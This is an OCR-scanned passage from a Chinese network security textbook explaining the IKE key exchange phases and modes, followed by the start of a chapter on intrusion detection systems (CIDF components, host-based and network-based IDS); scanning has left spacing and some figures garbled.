密 钥 交 换 模式 和 方法 、 密 钥 的 更 新 方法 。Internet 安全 关联 和 密 钥 管理 协议 (ISAKMP ) 对 
验证 和 密 钥 交换 提出 了 结构 框架 ,但 没有 具体 定义 ; 被 设计 用 来 独立 的 进行 密 钥 交换 , 即 被 
设计 用 于 支持 多 种 不 同 的 密 钥 交换 。Oakley 描述 了 一 系列 被 称 为 “模式 ”的 密 钥 交换 ,并 详 
述 了 每 一 种 密 钥 交换 提供 的 服务 。SKEME 描述 了 一 种 提供 匿名 、 和 否认 和 快速 密 钥 更 新 的 
通用 密 钥 交换 技术 。IKE 是 使 用 部 分 Oakley .部 分 SKEME、 并 结合 ISAKMP 的 一 种 协议 ， 
它 使 用 ISAKMP 来 得 到 已 验证 的 用 于 生成 密 钥 和 其 他 安全 联盟 (如 AH,ESP) 中 用 于 
IETE IPSec DOI 的 材料 。IKE 协议 是 Oakley 和 SKEME 协议 的 一 种 混合 , 并 在 由 
ISAKMP 规定 的 一 个 框架 内 运作 。Oakley 和 SKEME 定义 了 通信 双方 建立 一 个 共享 的 验 
证 密 钥 所 必须 采取 的 步骤 。IKE 利用 ISAKMP 语言 对 这 些 步 又 以 及 其 他 信息 交换 措施 进 

IKE 的 用 途 就 是 在 IPSec 通信 双方 之 间 ,建立 起 共 
享 安全 参数 及 验证 过 的 密 钥 , 即 建立 "安全 关联 "关系 ， |E KE 
如 图 4.9 所 示 。 

IKE 是 一 种 常规 用 途 的 安全 交换 协议 ,可 用 于 策略 [AD Ipse 
的 磋商 ,以 及 验证 加 密 材料 的 建立 ,适用 于 多 方面 的 需 
求 如 SNMPv3,OSPFv2 等 。IKE 采用 的 规范 是 在 解释 
Jii (Domain of Interpretation, DOD P HÆ KJ. FXF IPSec 存在 着 一 个 名 为 RFC2407 的 解 
释 域 , 它 定义 了 IKE 具体 如 何 与 IPSec SA 进行 协商 。 如 果 其 他 协议 要 用 到 IKE ,每 种 协议 
都 要 定义 各 自 的 DOI。 为 正确 实施 IKE , 需 遵守 3 份 文件 (文档 ) 的 规定 ,它们 分 别 是: 基本 
ISAKMP 规范 (RFC2408) .IPSec 解释 域 (RFC2407) IKE 规范 本 身 (RFC2409) 。 

IKE 主要 完成 两 个 作用 : 安全 关联 的 集中 化 管理 和 减少 连接 时 间 、 密 钥 的 生成 和 管理 。 

Oakley 和 SKEME 各 自 定义 了 建立 经 过 验证 的 密 钥 交换 的 方法 。 其 中 包括 负载 的 构 
建 ,信息 负载 的 运送 ,它们 被 处 理 的 顺序 以 及 被 使 用 的 方法 。Oakley 定义 了 “模式 ”， 
ISAKMP 定义 了 “阶段 "。 两 者 之 间 的 关系 非常 直接 ,IKE 描述 了 在 两 个 阶段 中 进行 的 不 同 
的 、 称 为 模式 的 交换 。 

IKE 建立 SA 分 两 个 阶段 。 第 一 阶段 ,协商 创建 一 个 通信 信道 CIKE SAO ,并 对 该 信道 
进行 认证 ,为 双方 进一步 的 IKE 通信 提供 机 密 性 .数据 完整 性 及 数据 源 认 证 服务 ,IKE 定义 
了 两 个 第 一 阶段 的 协商 : 

第 一 阶段 协商 ( 主 模式 协商 ) 步 又 : 

主 模式 交换 提供 了 身份 保护 机 制 ,经 过 3 个 步骤 ,6 个 消息 ,前 2 个 消息 协商 策略 ; 中 间 
2 个 消息 交换 Diffie-Hellman 的 公共 值 和 必要 的 辅助 数据 ; 最 后 2 个 消息 验证 Diffie- 
Hellman 交换 ,如 图 4. 10 所 示 。 

COD 策略 协商 交换 。IKE 以 “保护 组 (Protectionsuite)” 的 形式 来 定义 策略 。 每 个 保护 
组 都 至 少 需要 定义 采用 的 加 密 算法 (选择 DES 或 3DES) 、 散 列 算法 (选择 MD5 或 SHA), 
Diffie-Hellman 组 以 及 验证 方法 (数字 签名 ,公共 密 钥 加 密 的 两 种 验证 ,或 者 共享 密 钥 认 
WE). IKE 的 策略 数据 库 则 列 出 了 所 有 保护 组 ( 按 各 个 参数 的 顺序 )。 由 于 通信 双方 决定 了 
一 个 特定 的 策略 组 后 ,它们 以 后 的 通信 必须 根据 它 进行 , 所 以 这 种 形式 的 协商 是 两 个 IKE 
通信 实体 第 一 步 所 需要 做 的 。 
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图 4.9 IKE 的 用 途 


发 起 方 响应 方 
| Header SA 


| Header KE Nonce; 


一 Header KE Nonce; 
| Header ID; [Cert] Sig; |[———-— 
Header ID, | [Cert] Sig, 


图 4.10 使 用 签名 验证 的 主 模式 


(2) Diffie-Hellman 共享 值 `.Nonce 交换 交换 。 虽 然 名 为 密 钥 交换 ,但 事实 上 交换 的 只 
是 一 些 DH 算法 生成 共享 密 钥 所 需要 的 基本 材料 信息 。 在 彼此 交换 过 密 钥 生成 材料 后 ,两 
端 主机 可 以 各 自生 成 出 完全 一 样 的 共享 “ 主 密 钥 ”, 保护 紧 接 其 后 的 认证 过 程 。Diffie- 
Hellman 交换 以 及 一 个 共享 秘密 的 建立 是 IKE 协议 的 第 二 步 。 

(3) 身份 验证 交换 。IKE 交换 的 下 一 个 步骤 便 是 对 Diffie-Hellman 共享 秘密 进行 验 
证 ,同时 还 要 对 IKESA 本 身 进 行 验证 。DH 交换 需要 得 到 进一步 认证 ,如 果 认证 不 成 功 , 通 
信 将 无 法 继续 下 去 。“ 主 密 钥 ?结合 在 第 一 步 中 确定 的 协商 算法 ,对 通信 实体 和 通信 信道 进 
行 认证 。 在 这 一 步 中 ,整个 待 认证 的 实体 载荷 ,包括 实体 类 型 .端口 号 和 协议 , 均 由 前 一 步 生 
成 的 “ 主 密 钥 "提供 机 密 性 和 完整 性 保证 。 一 个 或 多 个 证 书 负载 在 传递 中 是 可 选 的 。 

在 野蛮 模式 下 ,总 共 3 个 信息 被 交换 。 第 一 个 信息 由 SA. Nonce 和 身份 组 成 。 第 二 个 
信息 是 在 验证 发 起 方 并 接受 SA 后 ,响应 方 发 送 Nonce 和 身份 信息 给 发 起 方 。 第 三 个 信息 
是 发 起 方 验证 响应 方 的 身份 以 及 进行 被 提议 的 信息 的 交换 ,如 图 4. 11 所 示 。 

发 起 方 响应 方 
Header SA [KE] | Nonce; | [ID] 


—— —] header | sa | [KE | Nonce | tib | (Cer | sig 


Header [Cert] | Sig; e 


图 4.11 带 签名 的 野蛮 模式 


在 Aggressive 模式 下 ,两 个 在 第 一 次 交换 发 送 的 身份 信息 是 没有 加 密 的 。Aggressive 
模式 的 优点 是 信息 交换 快速 ,但 加 密 被 节省 了 。 

第 二 阶段 建立 SA( 快 速 模 式 )。 

这 一 阶段 协商 建立 IPSec SA ,为 数据 交换 提供 IPSec 服务 。 第 二 阶段 协商 消息 受 第 一 
阶段 SA 保护 ,任何 没有 第 一 阶段 SA 保护 的 消息 将 被 拒 收 。 
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快速 模式 本 身 并 不 是 一 次 完整 的 交换 (因为 它 和 第 一 阶段 交换 相关 联 ), 但 又 作为 SA 
协商 过 程 (第 二 阶段 ) 的 一 部 分 用 来 衍生 密 钥 材料 和 协商 非 ISAKMP SA 的 共享 策略 。 快 
速 模式 交换 的 信息 必须 由 ISAKMP SA 来 保护 , 即 除了 ISAKMP 报头 外 ,所 有 的 负载 都 要 
加 密 。 在 快速 模式 中 , Hash 负载 必须 立即 跟随 在 ISAKMP 报头 后 ,SA 负载 必须 紧 跟 在 
Hash 负载 之 后 。Hash 用 于 验证 消息 ,同时 也 提供 了 参与 的 证 据 。 

快速 模式 基本 上 是 一 次 SA 协商 和 提供 重 放 保护 的 Nonce 交换 。Nonce 用 于 产生 新 的 
密 钥 材料 并 阻止 通过 重 放 攻击 产生 虚假 的 安全 联盟 。 可 选 的 密 钥 交 换 (KE) 负 载 可 以 经 交 
换 来 实现 通过 快速 模式 产生 附加 的 Diffie-Hellman 交换 以 及 求索 运算 。 但 是 必须 支持 使 用 
快速 模式 的 密 钥 交换 负载 成 为 可 选 的 。 

第 二 阶段 协商 (快速 模式 协商 ) 步 骤 , 如 图 4. 12 所 示 。 

发 起 方 响应 方 

Header uash| SA | Nonce; | IKE] | noa | uoa 上 一- 


Header [Hash SA | Nonce; | [KE] | [D] | [ID] 


Header [hasn] - 


图 4.12 快速 模式 


快速 模式 交换 通过 三 条 消息 建立 IPSec SA: 前 2 条 消息 协商 IPSec SA 的 各 项 参数 值 ， 
并 生成 IPSec 使 用 的 密 钥 。 包 括 使 用 哪 种 IPSec 协议 (AH 或 ESP) .使 用 哪 种 Hash 算法 
(MD5 或 SHA) 是否 要 求 加 密 ,若是 ,选择 加 密 算法 (DES 或 3DES) 。 在 上 述 3 方面 达成 一 
致 后 ,将 建立 起 2 个 SA, 分别 用 于 入 站 和 出 站 通信 。 第 2 条 消息 还 为 响应 方 提供 在 场 的 证 
据 ; 第 3 条 消息 为 发 起 方 提供 在 场 的 证 据 。 


第 5 章 入 侵 检 测 


5.1 入 侵 检 测 概述 


5.1.1 IDS 存在 与 发 展 的 必然 性 


当 越 来 越 多 的 公司 将 其 核心 业务 向 互联 网 转移 的 时 候 , 网 络 安全 作为 一 个 无 法 回避 的 
问题 呈现 在 人 们 面前 。 传 统 上 ,公司 一 般 采 用 防火 墙 作 为 安全 的 第 一 道 防线 。 而 随 着 攻击 
者 知识 的 日 趋 成 熟 , 攻 击 工具 与 手法 的 日 趋 复杂 多 样 ,单纯 的 防火 墙 策略 已 经 无 法 满足 对 安 
全 高 度 敏 感 的 部 门 的 需要 ,网 络 的 防卫 必须 采用 一 种 纵深 的 ,多样 的 手段 。 与 此 同时 ,当今 
的 网 络 环境 也 变 得 越 来 越 复杂 ,各 式 各 样 的 复杂 的 设备 ,需要 不 断 升 级 .补漏 的 系统 使 得 网 
络 管理 员 的 工作 不 断 加 重 , 不 经 意 的 疏忽 便 有 可 能 造成 安全 的 重大 隐患 。 

利用 防火 墙 ,通常 能 够 在 内 外 网 络 之 间 提供 安全 的 网 络 保护 ,降低 了 网 络 安 全 风险 。 
但 是 ,仅仅 使 用 防火 墙 \ 网 络 安全 还 远 远 不 够 : 人 侵 者 可 寻找 防火 墙 背 后 可 能 敞开 的 后 
门 ; 入 侵 者 可 能 就 在 防火 墙 内 ; 由 于 性 能 的 限制 ,防火 墙 通常 不 能 提供 实时 的 入 侵 检测 
能 力 。 

如 何 识别 未 经 授权 而 使 用 计算 机 系统 的 非法 用 户 和 那些 对 系统 有 访问 权限 但 滥用 其 特 
权 的 用 户 就 需要 进行 人 侵 检测 。 

入 侵 检测 是 防火 墙 的 合理 补充 ,帮助 系统 对 付 网 络 攻击 ,扩展 了 系统 管理 员 的 安全 管理 
能 力 (包括 安全 审计 ,监视 .进攻 识别 和 响应 ) ,提高 了 信息 安全 基础 结构 的 完整 性 。 入 侵 检 
测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ,提供 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保 
护 。 这 些 都 通过 它 执行 以 下 任务 来 实现 。 

(1) 监视 .分 析 用 户 及 系统 活动 ,查找 非法 用 户 和 合法 用 户 的 越权 操作 。 

(2) 系统 构造 和 弱点 的 审计 ,并 提示 管理 员 修补 漏洞 。 

(3) 识别 反映 已 知 进攻 的 活动 模式 并 向 相关 人 员 报 警 , 能 够 实时 对 检测 到 的 入 侵 行为 
进行 反应 。 

CD 异常 行为 模式 的 统计 分 析 , 发 现 入 侵 行为 的 规律 。 

(5) 评估 重要 系统 和 数据 文件 的 完整 性 ,如 计算 和 比较 文件 系统 的 校 验 和 。 

(6) 操作 系统 的 审计 跟踪 管理 ,并 识别 用 户 违反 安全 策略 的 行为 。 


5.1.2. 入 侵 检 测 的 概念 


入 侵 检 测 (Intrusion Detection) ,顾名思义 , 便 是 对 入 侵 行为 的 发 觉 。 它 通过 对 计算 机 
网 络 或 计算 机 系统 中 的 若干 关键 点 收集 信息 并 对 其 进行 分 析 , 从 中 发 现 网 络 或 系统 中 是 否 
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有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 进 行人 侵 检 测 的 软件 与 硬件 的 组 合 便 是 和 人 侵 检 测 
系统 (Intrusion Detection System,IDS) 。 与 其 他 安全 产品 不 同 的 是 ,入 侵 检 测 系 统 需要 更 
多 的 智能 , 它 必 须 可 以 将 得 到 的 数据 进行 分 析 ,并 得 出 有 用 的 结果 。 一 个 合格 的 入 侵 检 测 系 
统 能 大 大 简化 管理 员 的 工作 ,保证 网 络 安全 的 运行 。 

具体 说 来 ,入 侵 检测 系统 的 主要 功能 有 以 下 几 种 。 

(1) 监测 并 分 析 用 户 和 系统 的 活动 。 

(2) 核查 系统 配置 和 漏洞 。 

(3) 评估 系统 关键 资源 和 数据 文件 的 完整 性 。 

(4) 识别 已 知 的 攻击 行为 。 

(5) 统计 分 析 异 常 行为 。 

(6) 操作 系统 日 志 管理 ,并 识别 违反 安全 策略 的 用 户 活 动 。 


5.2 入 侵 检 测 系统 的 基本 结构 


通用 入 侵 检 测 框架 (Common Intrusion Detection Framework. CIDF) Bi] 3€ T — ^P fj ME 
的 IDS 的 通用 模型 ; 规范 语言 定义 了 一 个 用 来 描述 各 种 检测 信息 的 标准 语言 ; 内 部 通信 定 
XT IDS 组 件 之 间 进 行 通信 的 标准 协议 ; 程序 接口 提供 了 一 整套 标准 的 应 用 程序 接口 
CAPI KO . 

CIDF 将 IDS 需要 分 析 的 数据 统称 为 事件 (Event) , 它 可 以 是 基于 网 络 的 IDS 从 网 络 中 
提取 的 数据 包 , 也 可 以 是 基于 主机 的 IDS 从 系统 日 志 等 其 他 途径 得 到 的 数据 信息 。 

CIDF 组 件 之 间 的 交互 数据 使 用 通用 入 侵 检测 对 象 (Generalized Intrusion Detection 
Objects,GIDO) 格 式 ,一 个 GIDO 可 以 表示 在 一 些 特定 时 刻 发 生 的 一 些 特定 事件 ,也 可 以 表 
示 从 一 系列 事件 中 得 出 的 一 些 结论 ,还 可 以 表示 执行 某 个 行动 的 指令 。 

CIDF 将 一 个 人 侵 检测 系统 分 为 以 下 组 件 ,如 图 5. 1 所 示 。 


sita Iso itor Iss mito 上 
GIDO 
事件 数据 库 


图 5.1 CIDF 组件 


(1) 事件 产生 器 (Event Generators): 从 入 侵 检测 系统 外 的 整个 计算 环境 中 获得 事件 ， 
并 以 CIDF GIDOs 格式 向 系统 的 其 他 部 分 提供 此 事件 。 事 件 产 生 器 是 所 有 IDS 所 需要 的 ， 
同时 也 是 可 以 重用 的 。 

(2) 事件 分 析 器 (Event Analyzers): 从 其 他 组 件 接收 GIDOs, 分 析 得 到 的 数据 ,并 产生 
新 的 GIDOs。 如 分 析 器 可 以 是 一 个 轮廓 特征 引擎 。 

(3) 响应 单元 (Response Units): 是 对 分 析 结 果 做 出 反应 的 功能 单元 , 它 可 以 终止 进 
程 . 重 置 连接 改变 文件 属性 等 ,也 可 以 只 是 简单 的 报警 。 

(4). 事件 数据 库 (Event Databases); 是 存放 各 种 中 间 和 最 终 数据 的 统称 , 它 可 以 是 复 


杂 的 数据 库 , 也 可 以 是 简单 的 文本 文件 。 

CIDF 将 各 组 件 之 间 的 通信 划分 为 3 个 层次 结构 : GIDO 层 (GIDO Layer) 、 消 息 层 
(Message Layer) 和 协商 传输 层 (Negotiated Transport Layer)。 其 中 协商 传输 层 不 属于 
CIDF 规范 , 它 可 以 采用 很 多 种 现 有 的 传输 机 制 来 实现 。 消 息 层 确保 被 加 密 认 证 的 消息 在 
防火 墙 或 网 络 地 址 转换 NAT 等 设备 之 间 传 输 过 程 中 的 可 靠 性 。 消 息 层 不 关心 传输 的 内 
容 , 只 负责 建立 一 个 可 靠 的 传输 通道 。GIDO 层 任 务 就 是 提高 组 件 之 间 的 互 操作 性 ,负责 对 
传输 信息 的 格式 化 ,就 如 何 表示 各 种 各 样 的 事件 做 了 详细 的 定义 。GIDO 层 只 考虑 所 传递 
信息 的 语义 ,不 关心 这 些 消息 怎样 被 传递 。 

CIDF 也 对 各 组 件 之 间 的 信息 传递 格式 、 通 信和 方法 和 标准 API 进行 了 标准 化 。 在 现 有 
的 IDS 中 ,经 常用 数据 采集 部 分 、 分 析 部 分 、 响 应 部 分 和 日 志 来 分 别 代替 事件 产生 器 、 事 件 
分 析 器 、 响 应 单元 和 事件 数据 库 这 些 术 语 。 

CIDF 的 规范 语言 文档 定义 了 一 个 应 用 层 的 公共 入 侵 标准 语言 (Common Intrusion 
Specification Language,CISL), 各 IDS 使 用 统一 的 CISL 来 表示 原始 事件 信息 (审计 踪迹 记 
录 和 网 络 数 据 流 信 息 )、 分 析 结 果 ( 系 统 异常 和 攻击 特征 描述 ) 和 响应 指令 (停止 某 些 特定 的 
活动 或 修改 组 件 的 安全 参数 ) ,从 而 建立 了 IDS 之 间 信 息 共 享 的 基础 。CISL 是 CIDF 的 最 
核心 也 是 最 重要 的 内 容 ,GIDO 的 构建 与 编码 是 CISL 的 重点 。 

CIDF 的 内 部 通信 文档 描述 了 两 种 CIDF 组 件 之 间 通 信和 的 机 制 ,一 种 为 匹配 服务 
(Matchmaking Service) 法 , 另 一 种 为 消息 层 (Message Layer) 法 。 

CIDF 的 匹配 服务 (也 叫做 匹配 器 ) ,为 CIDF 各 组 件 之 间 的 相互 识别 、 定 位 和 信息 共享 
提供 了 一 个 标准 的 、 统 一 的 机 制 。 匹 配器 的 实现 是 基于 轻 目 录 存 取 协 议 (the Lightweight 
Directory Access Protocol,LDAP) ,每 个 组 件 通 过 目录 服务 注册 ,并 公告 它 能 够 产生 或 能 够 
处 理 的 GIDO, 这 样 组 件 就 被 分 类 存放 ,其 他 组 件 就 可 以 方便 地 查找 到 那些 它们 需要 通信 的 
组 件 。 目 录 中 还 可 以 存放 组 件 的 公共 密 钥 ,从 而 实现 对 组 件 接收 和 发 送 GIDO 时 的 身份 
认证 。 

CIDF 的 消息 层 在 易 受 攻击 的 环境 中 实现 了 一 种 安全 (保密 、 可 信 、 完 整 ) 并 可 靠 的 信息 
交换 机 制 。 使 用 消息 机 制 主要 是 为 了 达到 以 下 的 目的 使 通信 与 阻塞 和 非 阻塞 处 理 无 关 、 使 
通信 与 数据 格式 无 关 、 使 通信 与 操作 系统 无 关 、 使 通信 和 与 编程 语言 无 关 。 默 认 情况 下 消息 传 
输 是 基于 UDP 的 , 且 使 用 端口 0x0CDF 作为 CIDF 消息 传输 的 服务 端口 。 

CIDF 的 程序 接口 文档 描述 了 用 于 GIDO 编 解码 以 及 传输 的 应 用 程序 接口 API, 负责 
GIDO 的 编码 .解码 和 传递 , 它 提供 的 调用 功能 使 得 程序 员 可 以 在 不 了 解 编码 和 传递 过 程 具 
体 细节 的 情况 下 ,以 一 种 很 简单 的 方式 构建 和 传递 GIDO。API 包括 以 下 几 部 分 内 容 : 
GIDO 编码 和 解码 API (GIDO Encoding/Decoding API Specification )、 消 息 层 API 
(Message Layer API Specification)、GIDO 动态 追加 APICGIDO Addendum API)、 签 名 
APICSignature API) 顶层 CIDF 的 APICTop-Level CIDF API), 

GIDO 有 两 种 表现 形式 : 一 种 为 逻辑 形式 ,表现 为 ASCI 文本 的 S 表达 式 , 它 是 用 户 可 
读 的 树 形 结构 ; 另 一 种 为 编码 形式 ,表现 为 二 进 制 的 与 机 器 相关 的 数据 结构 。GIDO 编 解 
码 API X T GIDO 在 这 两 种 形式 之 间 进 行 转换 的 标准 程序 接口 , 它 使 应 用 程序 可 以 方便 
地 转换 GIDO 而 不 必 关 心 其 具体 技术 细节 。 
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5.3 人 入侵 检测 的 分 类 


5.3.1 根据 采用 的 技术 分 类 


根据 采用 的 技术 分 为 异常 检测 特征 检测 和 协议 分 析 。 

COD 异常 检测 : 假设 入 侵 者 活动 异常 于 正常 主体 的 活动 ,建立 正常 活动 的 “活动 简 档 ”， 
当前 主体 的 活动 违反 其 统计 规律 时 ,认为 可 能 是 入侵" 行为。 通过 检测 系统 的 行为 或 使 用 
情况 的 变化 来 完成 。 

(2) 特征 检测 : 假设 入 侵 者 活动 可 以 用 一 种 模式 来 表示 ,然后 将 观察 对 象 与 之 进行 比 
较 , 判 别 是 否 符合 这 些 模 式 。 
(3) 协议 分 析 : 利用 网 络 协议 的 高 度 规则 性 快速 探测 攻击 的 存在 。 


5.3.2 根据 其 监测 的 对 象 是 主机 还 是 网 络 分 类 


根据 其 监测 的 对 象 是 主机 还 是 网 络 分 为 基于 主机 的 入 侵 检测 系统 和 基于 网 络 的 入 侵 检 
测 系统 。 

1. 基于 主机 的 人 侵 检 测 系统 

基于 主机 的 人 侵 检测 系统 通过 监视 与 分 析 主 机 的 审计 记录 检测 人 侵 。 能 否 及 时 采集 到 
审计 是 这 些 系 统 的 弱点 之 一 ,和 人 侵 者 会 将 主机 审计 子 系统 作为 攻击 目标 以 避 开 入侵 检测 
系统 。 

基于 主机 的 人 侵 检测 系统 (HIDS) 通 常 是 安装 在 被 重点 检测 的 主机 之 上 ,主要 是 对 该 主 
机 的 网 络 实时 连接 以 及 系统 审计 日 志 进 行 智能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 
(特征 或 违反 统计 规律 ), 入 侵 检 测 系统 就 会 采取 相应 措施 。 

基于 主机 的 IDS 使 用 验证 记录 ,并 发 展 了 精密 的 可 迅速 做 出 响应 的 检测 技术 。 通 常 ， 
基于 主机 的 IDS 可 监 探 系统 .事件 和 Windows NT 下 的 安全 记录 以 及 UNIX 环境 下 的 系统 
记录 。 当 有 文件 发 生变 化 时 ,IDS 将 新 的 记录 条 目 与 攻击 标记 相 比 较 , 看 它们 是 否 匹 配 。 如 
果 匹 配 ,系统 就 会 向 管理 员 报 警 并 向 别 的 目标 报告 ,以 采取 措施 。 

基于 主机 的 IDS 在 发 展 过 程 中 融入 了 其 他 技术 。 对 关键 系统 文件 和 可 执行 文件 的 入 
侵 检测 的 一 个 常用 方法 ,是 通过 定期 检查 校 验 和 来 进行 的 ,以 便 发 现 意外 的 变化 。 反 应 的 快 
慢 与 轮 询 间隔 的 频率 有 直接 的 关系 。 最 后 ,许多 系统 都 是 监听 端口 的 活动 ,并 在 特定 端口 被 
访问 时 向 管理 员 报 警 。 这 类 检测 方法 将 基于 网 络 的 人 侵 检测 的 基本 方法 融和 人 到 基于 主机 的 
检测 环境 中 。 

尽管 基于 主机 的 入侵 检查 系统 不 如 基于 网 络 的 入 侵 检 查 系统 快捷 ,但 它 确实 具有 基于 
网 络 的 系统 无 法 比拟 的 优点 。 这 些 优 点 包括 : 更 好 的 辨识 分 析 、 对 特殊 主机 事件 的 紧密 关 
注 及 低廉 的 成 本 。 基 于 主机 的 人 侵 侦查 系统 包括 以 下 内 容 。 

(1) 确定 攻击 是 否 成 功 。 由 于 基于 主机 的 IDS 使 用 含有 已 发 生 事件 信息 ,它们 可 以 比 
基于 网 络 的 IDS 更 加 准确 地 判断 攻击 是 否 成 功 。 在 这 方面 ,基于 主机 的 IDS 是 基于 网 络 的 
IDS 完美 补充 ,网 络 部 分 可 以 尽早 提供 警告 ,主机 部 分 可 以 确定 攻击 成 功 与 否 。 


(2) 监视 特定 的 系统 活动 。 基 于 主机 的 IDS 监视 用 户 和 访问 文件 的 活动 ,包括 文件 访 
问 改变 文件 权限 ,试图 建立 新 的 可 执行 文件 或 者 试图 访问 特殊 的 设备 。 例 如 ,基于 主机 的 
IDS 可 以 监督 所 有 用 户 的 登录 及 上 网 情况 ,以 及 每 位 用 户 在 连接 到 网 络 以 后 的 行为 ,而 对 于 
基于 网 络 的 系统 要 做 到 这 个 程度 是 非常 困难 的 。 基 于 主机 技术 还 可 监视 只 有 管理 员 才 能 实 
施 的 非 正 常 行为 。 操 作 系 统 记录 了 任何 有 关 用 户 账 号 的 增加 、 删 除 、 更 改 的 情况 ,只 要 改动 
一 旦 发 生 ,基于 主机 的 IDS 就 能 检测 到 这 种 不 适当 的 改动 ,还 可 审计 能 够 影响 系统 记录 的 
校 验 措施 的 改变 。 基 于 主机 的 系统 可 以 监视 主要 系统 文件 和 可 执行 文件 的 改变 ,系统 能 够 
查 出 那些 欲 改 写 重要 系统 文件 或 者 安装 特洛伊 木马 或 后 门 的 尝试 并 将 它们 中 断 ,而 基于 网 
络 的 系统 有 时 会 查 不 到 这 些 行 为 。 

(3) 能 够 检查 到 基于 网 络 的 系统 检查 不 出 的 攻击 。 基 于 主机 的 系统 可 以 检测 到 那些 基 
于 网 络 的 系统 察觉 不 到 的 攻击 。 例 如 ,来 自主 要 服务 器 键盘 的 攻击 不 经 过 网 络 ,所 以 可 以 躲 
开 基于 网 络 的 人 侵 检 测 系统 。 

(4) 适用 被 加 密 的 和 交换 的 环境 。 交 换 设 备 可 将 大 型 网 络 分 成 许多 个 小 型 网 络 部 件 加 
以 管理 ,所 以 从 覆盖 足够 大 的 网 络 范围 的 角度 出 发 ,很 难 确定 配置 基于 网 络 的 TDS 的 最 佳 
位 置 。 业 务 映 射 和 交换 机 上 的 管理 端口 有 助 于 此 ,但 这 些 技术 有 时 并 不 适用 。 基 于 主机 的 
入 侵 检 测 系 统 可 安装 在 所 需 的 重要 主机 上 ,在 交换 的 环境 中 具有 更 高 的 能 见 度 。 某 些 加 密 
方式 也 向 基于 网 络 的 入侵 检测 发 出 了 挑战 ,由 于 加 密 方式 位 于 协议 堆栈 内 ,所 以 基于 网 络 的 
系统 可 能 对 某 些 攻击 没有 反应 ,基于 主机 的 IDS 没有 这 方面 的 限制 , 当 操作 系统 及 基于 主 
机 的 系统 看 到 即将 到 来 的 业务 时 ,数据 流 已 经 被 解密 了 。 

C5) 近 于 实时 的 检测 和 响应 。 尽 管 基于 主机 的 入 侵 检 测 系 统 不 能 提供 真正 实时 的 反 
应 ,但 如 果 应 用 正确 ,反应 速度 可 以 非常 接近 实时 。 旧 式 系统 利用 一 个 进程 在 预先 定义 的 间 
隔 内 检查 登记 文件 的 状态 和 内 容 ,与 旧式 系统 不 同 , 当 前 基于 主机 的 系统 的 中 断 指令 ,这 种 
新 的 记录 可 被 立即 处 理 , 显 著 减少 了 从 攻击 验证 到 做 出 响应 的 时 间 ,在 从 操作 系统 做 出 记录 
到 基于 主机 的 系统 得 到 辨识 结果 之 间 的 这 段 时 间 是 一 段 延迟 ,但 大 多 数 情况 下 ,在 破坏 发 生 
之 前 ,系统 就 能 发 现 人 侵 者 ,并 中 止 他 的 攻击 。 

(6) 不 要 求 额 外 的 硬件 设备 。 基 于 主机 的 和 人 侵 检测 系统 存在 于 现行 网 络 结构 中 ,包括 
文件 服务 器 , Web 服务 器 及 其 他 共享 资源 。 这 些 使 得 基于 主机 的 系统 效率 很 高 。 因 为 它们 
不 需要 在 网 络 上 另外 安装 登记 、 维 护 及 管理 的 硬件 设备 。 

CD 记录 花费 更 加 低廉 。 基 于 网 络 的 人 侵 检 测 系统 比 基 于 主机 的 和 人 侵 检测 系统 要 昂贵 
的 多 。 

基于 主机 的 入 侵 检测 系统 有 如 下 的 弱点 。 

(1) 主机 入 侵 检测 系统 通常 安装 在 需要 保护 的 设备 上 ,如 当 一 个 数据 库 服务 器 要 保护 
时 ,就 要 在 该 服务 器 上 安装 入侵 检测 系统 。 这 会 降低 应 用 系统 的 效率 。 此 外 , 它 也 会 带 来 一 
些 额 外 的 安全 问题 ,安装 了 主机 入 侵 检测 系统 后 ,将 本 不 允许 安全 管理 员 有 权力 访问 的 服务 
器 变 成 可 以 访问 了 。 

D 主机 入侵 检测 系统 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 。 如 果 服 务 器 没有 配置 日 
志 功 能 , 则 必需 重新 配置 ,这 将 会 给 运行 中 的 业务 系统 带 来 不 可 预见 的 性 能 影响 。 

G) 全 面部 署 主机 入侵 检测 系统 代价 较 大 ,企业 中 很 难 将 所 有 主机 用 主机 入 侵 检测 系 
统 保护 ,只 能 选择 部 分 主机 保护 。 那 些 未 安装 主机 入 侵 检测 系统 的 机 器 将 成 为 保护 的 盲点 ， 
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人 入侵 者 可 利用 这 些 机 器 达到 攻击 目标 。 

(4) 主机 入 侵 检测 系统 除了 监测 自身 的 主机 以 外 ,根本 不 监测 网 络 上 的 情况 。 对 入 侵 
行为 的 分 析 的 工作 量 将 随 着 主机 数目 增加 而 增加 。 

2. 基于 网 络 的 人 侵 检测 系统 

基于 网 络 的 入侵 检测 系统 通过 在 共享 网 段 上 对 通信 数据 的 侦 听 采集 数据 ,分 析 可 疑 现 
象 。 这 类 系统 不 需要 主机 提供 严格 的 审计 ,对 主机 资源 消耗 少 ,并 可 以 提供 对 网 络 通 用 的 保 
护 而 无 须 顾及 异 构 主机 的 不 同 架 构 。 

基于 网 络 的 入侵 检 测 系统 (NIDS) 放 置 在 比较 重要 的 网 段 内 ,不 停 地 监视 网 段 中 的 各 
种 数据 包 。 对 每 一 个 数据 包 进 行 特征 分 析 。 如 果 数 据 包 与 系统 内 置 的 某 些 规则 吻合 ,人 
侵 检测 系统 就 会 发 出 警报 甚至 直接 切断 网 络 连接 。 目 前 ,大 部 分 人 侵 检测 系统 是 基于 网 
络 的 。 

图 5. 2 展示 一 个 典型 NIDS。 一 个 传感器 被 安装 在 防火 墙 外 以 探查 来 自 Internet 的 攻 
击 。 另 一 个 传感器 安装 在 网 络 内 部 以 探查 那些 已 穿 透 防火 墙 的 入侵 和 内 部 网 络 入 侵 和 
威胁 。 
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图 5.2 基于 网 络 的 入侵 检测 系统 


基于 网 络 的 人 侵 检测 系统 使 用 原始 网 络 包 作 为 数据 源 。 基 于 网 络 的 IDS 通常 利用 一 
个 运行 在 随机 模式 下 的 网 络 适 配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 通信 业务 。 它 的 攻击 
辨识 模块 通常 使 用 4 种 常用 技术 来 识别 攻击 标志 : 模式 、 表 达 式 或 字 节 匹配 ; 频率 或 穿越 阅 
值 ; 低级 事件 的 相关 性 ; 统计 学 意义 上 的 非常 规 现象 检测 。 

